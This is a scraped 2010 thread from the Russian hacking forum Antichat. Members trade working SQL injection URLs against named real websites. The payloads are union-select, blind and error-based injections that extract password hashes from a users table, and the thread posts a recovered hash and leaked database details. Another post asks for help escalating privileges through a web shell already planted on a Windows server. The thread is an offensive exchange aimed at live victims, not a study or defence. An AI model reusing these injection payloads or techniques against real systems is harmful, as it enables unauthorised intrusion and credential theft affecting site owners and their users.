Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
13.06.2010, 16:06
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 Iceangel_:
Согласен
|
|
|
13.06.2010, 16:29
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от Iceangel_
зашел и все норм вывело 
Вообще, чувствительность к регистру(при указании имени базы или таблицы) у мускула зависит от платформы. В большинстве случаев, в Linux регистр играет роль, в Windows и Mac OS напротив. Вот инфа этого сайта. Линк дать немогу, так как сайт очень интересный.
5.0.51A:REWER:REWER@LOCALHOST:SUSE-LINUX-GNU
|
|
|
|
13.06.2010, 16:33
|
|
Banned
Регистрация: 07.06.2010
Сообщений: 7
Провел на форуме:
35716
Репутация:
0
|
|
кто подскажет как в это
http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,5,6,7,8
воткнут такой запрос
UPDATE `users` SET `user_pwd` = '048bc95b24facd7dc82937fa99e81389' WHERE `id` =6 LIMIT 1 ;
и вообще это реально?
|
|
|
|
13.06.2010, 16:42
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224
Репутация:
388
|
|
2POloid
http://www.rsgt.com/press_releases1_more.php?id=19+and+substring(@@ver sion,1,1)=5+--
крути как blind
Код:
http://www.rsgt.com/press_releases1_more.php?id=19+AND+ascii(lower(substring((select+user_pwd+from+users),1,1)))%3E52+--
=> первый символ хэша = "5"
Код:
http://www.rsgt.com/press_releases1_more.php?id=19+AND+ascii(lower(substring((select+user_pwd+from+users),2,1)))%3E101+--
=> второй символ хэша = "f"
и т.д.
Последний раз редактировалось Bb0y; 13.06.2010 в 16:52..
|
|
|
|
13.06.2010, 16:58
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от Bb0y
2POloid
http://www.rsgt.com/press_releases1_more.php?id=19+and+substring(@@ver sion,1,1)=5+--
крути как blind
Код:
http://www.rsgt.com/press_releases1_more.php?id=19+AND+ascii(lower(substring((select+user_pwd+from+users),1,1)))%3E52+--
=> первый символ хэша = "5"
Код:
http://www.rsgt.com/press_releases1_more.php?id=19+AND+ascii(lower(substring((select+user_pwd+from+users),2,1)))%3E101+--
=> второй символ хэша = "f"
и т.д. Не, ну это не по пацански.
http://www.rsgt.com/press_releases1_more.php?id=-19+or(1,1)=(select+count(0),concat((select+user_pw d+from+users+limit+0,1),floor(rand(0)*2))from(info rmation_schema.tables)group+by+2)--+
5f0210ed3fa1e3301e5fac5928cc9712
Стоп, я тоже мудак дезинформатор.
http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,unhex(hex(concat_ws(0x3a,user_ pwd))),4,5,6,7,8+from+users
2 Ruller, я заметил что там блайнд, вот и начал выпендриваться. А токо ща заметил что там обыкновенная скуля. (Без твоего поста (!) )
Последний раз редактировалось Ctacok; 13.06.2010 в 17:09..
|
|
|
|
13.06.2010, 17:07
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
Bb0y, Ctacok WTF?!
Код:
http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,aes_decrypt(aes_encrypt(user_pwd,1),1),6,7,8+from+users
Сообщение от POloid
кто подскажет как в это
http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,5,6,7,8
воткнут такой запрос
UPDATE `users` SET `user_pwd` = '048bc95b24facd7dc82937fa99e81389' WHERE `id` =6 LIMIT 1 ;
и вообще это реально?
нет
__________________
Avant que l'ombre...
|
|
|
|
13.06.2010, 17:14
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Bb0y ты видишь функцию UPDATE, речь идет не о извлечении хеша из БД, а изменении его с помощью запроса!!
|
|
|
|
13.06.2010, 17:23
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
даа видно все сходят с ума
|
|
|
|
13.06.2010, 18:16
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Эммм....Вывели 3-ма разными способами 1 скулю... Очень оригинально.. Завтра он задаст такой же вопрос, только уже в другом месте. Одни понты 
Сообщение от FlaktW
Вот инфа этого сайта. Линк дать немогу, так как сайт очень интересный.
5.0.51A:REWER:REWER@LOCALHOST:SUSE-LINUX-GNU
Нy просто о_Oчень интересный сайт... Продавай шелл > покупай квартиру.
http://www.eje.cz/scripts/viewabstract.php?abstract=-1531'+union+select+group_concat(jmeno,0x3a,passwor d),2,3,4,5,6,7,8,9,10,11,12+from+admin--+
=> 101111 1100001 1100100 1101101 1101001 1101110 1110011 101111
Последний раз редактировалось v1d0qz; 13.06.2010 в 18:25..
|
|
|
|
13.06.2010, 18:46
|
|
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126
Репутация:
55
|
|
Сообщение от qq6ka
Я сейчас задам тупой вопрос. Залил шелл на Windows NT 5.2. Но процесс повышения прав в Windows - тёмный лес для меня.
Кто может помочь - стукните в аську 3765431-четые-9
актуально.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
